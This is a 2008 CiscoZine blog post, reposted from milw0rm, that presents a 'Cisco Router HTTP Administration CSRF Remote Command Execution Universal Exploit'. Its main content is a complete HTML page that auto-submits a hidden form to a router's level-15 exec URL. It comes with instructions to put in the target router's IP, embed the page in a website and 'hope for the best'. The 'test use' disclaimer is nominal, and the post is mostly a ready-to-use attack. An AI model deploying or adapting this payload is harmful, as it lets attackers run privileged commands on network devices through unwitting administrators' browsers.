How to test Cisco Cross-Site Request Forgery | CiscoZine

How to test Cisco Cross-Site Request Forgery

Author: Fabio Semperboni

Sep.18, 2008 in Exploit

Cisco Router HTTP Administration CSRF Remote Command Execution Universal Exploit. Replace “10.10.10.1″ with the IP address of the target router, embed this in a web page and hope for the best. This is only for test use.

<html>
<body>

<body onload="asdf.submit();">

<form name=asdf method="post" action="http://10.10.10.1/level/15/exec/-">

<input type=hidden name=command value="show privilege">

<input type=hidden name=command_url value="/level/15/exec/-">

</body>
</html>

# milw0rm.com [2008-09-17]

Tags: CSRF

Add to:

Similar posts

Post options

(No Ratings Yet)

Loading ...
Print This Post

Leave a Reply

Popular Posts
Categories
- Exploit (6)
- New products (14)
- Off topic (3)
- Security Advisory (31)
- Stories (35)
- Tutorial (33)
Meta

Add to…
Tags
ACS Advanced configuration ASA AXP Basic configuration BGP Business CCIE CCX Certifications Ciscozine Competition CSRF DOS EAP Event GTAP Hidden commands High Availability HSRP IOS IPv6 Jabber MiTM Monitor Path selection PIX Privilege escalation QOS Remote Control Report Routing SDM Secure a router SNMP Software Spanning-Tree Tips Undocumented Cisco commands Video Webcast WebEx WebEx exploit WebEx Meeting Manager Wifi
Archives
- March 2010 (2)
- February 2010 (3)
- January 2010 (3)
- December 2009 (2)
- November 2009 (4)
- October 2009 (3)
- September 2009 (3)
- August 2009 (2)
- July 2009 (7)
- June 2009 (3)
- May 2009 (3)
- April 2009 (6)
- March 2009 (7)
- February 2009 (8)
- January 2009 (11)
- December 2008 (11)
- November 2008 (8)
- October 2008 (12)
- September 2008 (21)
Links